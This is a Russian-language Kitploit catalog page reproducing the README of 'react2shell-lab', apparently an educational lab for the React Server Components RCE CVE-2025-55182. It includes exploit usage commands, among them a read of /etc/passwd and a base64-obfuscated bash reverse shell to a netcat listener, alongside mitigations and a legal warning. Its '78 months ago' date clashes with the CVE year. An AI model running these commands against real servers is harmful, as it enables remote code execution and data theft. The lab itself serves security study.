Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell PoC lab | Kitploit
Инструменты/GitHubGitHub/alsaut1/react2shell-lab
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access ToolPayload DevelopmentLabs & Practice
GitHubalsaut1/react2shell-lab

react2shell-lab

78 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 React2Shell PoC lab

Репозиторий

Лаборатория React2Shell - CVE-2025-55182

Комплексная лаборатория для демонстрации и тестирования критической уязвимости CVE-2025-55182 в серверных компонентах React.

⚠️ Только для образовательных целей

Этот репозиторий предназначен для:

  • Исследований и обучения в области безопасности
  • Понимания механизмов уязвимостей
  • Тестирования на собственных системах
  • Подготовки к охоте за багами (bug bounty)

Не используйте против систем, которые вам не принадлежат или на которые у вас нет явного разрешения на тестирование. Несанкционированный доступ незаконен.

🔴 Детали уязвимости

  • CVE ID: CVE-2025-55182
  • CVSS Оценка: 10.0 (Критическая)
  • Тип: Неаутентифицированное удалённое выполнение кода (RCE)
  • Затронутые компоненты:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Причина: Небезопасная десериализация в протоколе "Flight" серверных компонентов React

⚡ Возможности

✅ Выполнение произвольных команд без аутентификации
✅ Чтение системных файлов
✅ Создание и изменение файлов
✅ Установка обратного соединения (reverse shell)
✅ Полный контроль над сервером

🚀 Быстрый старт

1. Установка

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

Сервер запустится на http://localhost:3000

2. Проверка уязвимости

root@kitploit:~
bash check-cve.sh

3. Запуск эксплойтов

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Обратная оболочка (Reverse Shell)

root@kitploit:~
# Терминал 1 - Прослушиватель
nc -lvnp 4444

# Терминал 2 - Эксплойт
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Структура проекта

root@kitploit:~
├── app/              # Уязвимое приложение Next.js
├── exploit/          # Работающий PoC-эксплойт
│   └── rce_final.py  # Основной скрипт эксплойта
├── check-cve.sh      # Автоматическая проверка уязвимости
├── package.json      # Уязвимые зависимости
└── README.md

🔧 Технические детали

Уязвимость находится в логике десериализации полезных нагрузок серверных компонентов React. Эксплойт использует загрязнение прототипа (prototype pollution) для выполнения произвольного кода через process.mainModule.require('child_process').execSync().

Схема атаки

  1. Создание вредоносных multipart-данных формы
  2. Отправка уязвимому приложению React
  3. Эксплуатация небезопасной десериализации в протоколе "Flight"
  4. Достижение RCE на сервере

📊 Воздействие

  • Конфиденциальность: ВЫСОКАЯ (чтение любых файлов)
  • Целостность: ВЫСОКАЯ (изменение/создание файлов)
  • Доступность: ВЫСОКАЯ (выполнение команд отказа в обслуживании)

✅ Меры защиты

  1. Обновить React до версии 19.2.1 или новее
  2. Обновить Next.js до версии 15.0.5+ или 16.0.7+
  3. Развернуть правила веб-брандмауэра (WAF)
  4. Мониторинг журналов сервера на предмет попыток эксплуатации
  5. Использовать механизмы защиты времени выполнения

📚 Ссылки

  • react2shell.com
  • CVE-2025-55182 Details
  • React Security Advisory
  • CVSS Calculator

⚖️ Правовое предупреждение

Этот код предоставляется только для образовательных целей и авторизованного тестирования безопасности. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с такими законами, как Закон о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичным законодательством в других юрисдикциях.

Автор не несёт ответственности за неправомерное использование этой информации.

🎓 Результаты обучения

После прохождения этой лабораторной работы вы поймёте:

  • Как работают уязвимости небезопасной десериализации
  • Техники атак с загрязнением прототипа
  • Архитектура серверных компонентов React
  • Методы эксплуатации RCE
  • Правильные методы раскрытия уязвимостей
Скачать инструмент